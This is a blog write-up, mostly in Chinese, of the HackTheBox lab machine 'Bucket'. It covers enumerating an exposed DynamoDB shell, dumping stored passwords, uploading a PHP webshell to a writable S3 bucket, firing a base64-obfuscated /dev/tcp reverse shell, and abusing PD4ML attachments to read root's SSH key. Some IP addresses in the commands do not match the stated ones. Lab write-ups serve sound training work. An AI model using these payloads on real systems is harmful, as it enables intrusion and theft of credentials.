Bucket on HackTheBox

William Lin

2025-01-11

Cloud, DynamoDB, HackTheBox, Pentesting, aws, s3

Before all

Victim’s IP : 10.10.10.212
Victim’s Host : *.bucket.htb
Attacker’s IP : 10.10.14.14

RECON

port scan

Command

1	rustscan -a 10.10.10.212 --ulimit 5000 -- -sC -sV -Pn

Result

1 2	Open 10.10.11.212:22 Open 10.10.11.212:80

directory enumeration

瀏覽網站後發現有顯示不出來的圖片，找到網域 s3.bucket.htb
爆破一下：
Command

1	dirsearch --url 'http://s3.bucket.htb/' --exclude-status=404

Result

[00:36:47] Starting: 
[00:36:50] 200 -    2B  - /%2e%2e;/test
[00:36:51] 200 -    2B  - /+CSCOE+/logon.html                               
[00:36:51] 200 -    2B  - /+CSCOE+/session_password.html
[00:36:51] 200 -    2B  - /+CSCOT+/oem
[00:36:51] 200 -    2B  - /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
[00:36:51] 200 -    2B  - /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
[00:36:51] 200 -    2B  - /+CSCOT+/translation
[00:37:13] 200 -    2B  - /;/admin                                          
[00:37:13] 200 -    2B  - /;/json
[00:37:13] 200 -    2B  - /;/login                                          
[00:38:28] 200 -   54B  - /health                                           
[00:38:38] 500 -  290B  - /latest/meta-data/hostname                        
[00:39:15] 403 -  278B  - /server-status                                    
[00:39:15] 403 -  278B  - /server-status/
[00:39:18] 500 -  158B  - /shell.php                                        
[00:39:18] 500 -  158B  - /shell.jsp
[00:39:18] 200 -    0B  - /shell
[00:39:18] 500 -  158B  - /shell.js
[00:39:18] 500 -  158B  - /shell.sh
[00:39:18] 500 -  158B  - /shell.html
[00:39:18] 500 -  158B  - /shell.aspx
[00:39:18] 200 -   13KB - /shell/
[00:39:18] 500 -  158B  - /shellz.php

發現 shell 路徑，連進去看到 DynamoDB

Exploit

Enumerate DynamoDB

Command

1	aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/shell/

Result

{
    "TableNames": [
        "users"
    ]
}

拿到 Table Name Users 後再來 dump 它：
Command

1	aws dynamodb scan --endpoint-url http://s3.bucket.htb/shell/ --table users

Result

{
    "Items": [
        {
            "password": {
                "S": "Management@#1@#"
            },
            "username": {
                "S": "Mgmt"
            }
        },
        {
            "password": {
                "S": "Welcome123!"
            },
            "username": {
                "S": "Cloudadm"
            }
        },
        {
            "password": {
                "S": "n2vM-<_K_Q:.Aa2"
            },
            "username": {
                "S": "Sysadm"
            }
        }
    ],
    "Count": 3,
    "ScannedCount": 3,
    "ConsumedCapacity": null
}

拿到一坨帳號密碼

Abuse s3 bucket

列舉 buckets & 掃描權限
Command

1 2	aws s3 ls --endpoint-url=http://s3.bucket.htb aws s3api get-bucket-acl --bucket adserver --endpoint-url=http://s3.bucket.htb

Result

{
    "Owner": {
        "DisplayName": "webfile",
        "ID": "75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a"
    },
    "Grants": [
        {
            "Grantee": {
                "ID": "75aa57f09aa0c8caeab4f8c24e99d10f8e7faeebf76c078efc7c6caea54ba06a",
                "Type": "CanonicalUser"
            },
            "Permission": "FULL_CONTROL"
        }
    ]
}

發現有 FULL_CONTROL，直接寫入 php webshell
shell.php

1	<?php system($_POST['cmd']); ?>

Command

1 2	aws s3 cp shell.php s3://adserver --endpoint-url=http://s3.bucket.htb curl 'http://bucket.htb/shell.php' -d 'cmd=echo+c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNS85OTk5IDA%2BJjEK+\|+base64+-d+\|+bash'

Get Shell on port 9999

Privilege Escalation

Exploit PD4ML

注意到路徑 /var/www/bucket-app
index.php

<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}
else
{
?>

簡單來說，只要建立一個 table 是 alerts，並且 title 可以對應到 {"S":"Ransomware"} 就能被寫成 html 並被 pd4ml parse 資料出去
參考到這篇：https://www.aurian.com.au/blog/2021/07/24/preaching-to-converted/
可以用 attachment tag 做任意讀檔
Exploit

# Read Data
aws dynamodb create-table \                         
    --table-name=alerts \
    --attribute-definitions=AttributeName=title,AttributeType=S \
    --key-schema=AttributeName=title,KeyType=HASH \           
    --billing-mode=PAY_PER_REQUEST \   
    --endpoint-url=http://s3.bucket.htb

# Write Data
aws dynamodb put-item \    
    --table-name=alerts \
    --item='{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"/root/.ssh/id_rsa\" icon=\"graph\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' \
    --endpoint-url=http://s3.bucket.htb
	
# Trigger Action in index.php
curl localhost:8000/index.php -d 'action=get_alerts'

# Get PDF File
wget localhost:8000/files/result.pdf -O pwned.pdf

最後點開附件就可以拿到 id_rsa 登入惹

Command

1	sudo ssh root@bucket.htb -i id_rsa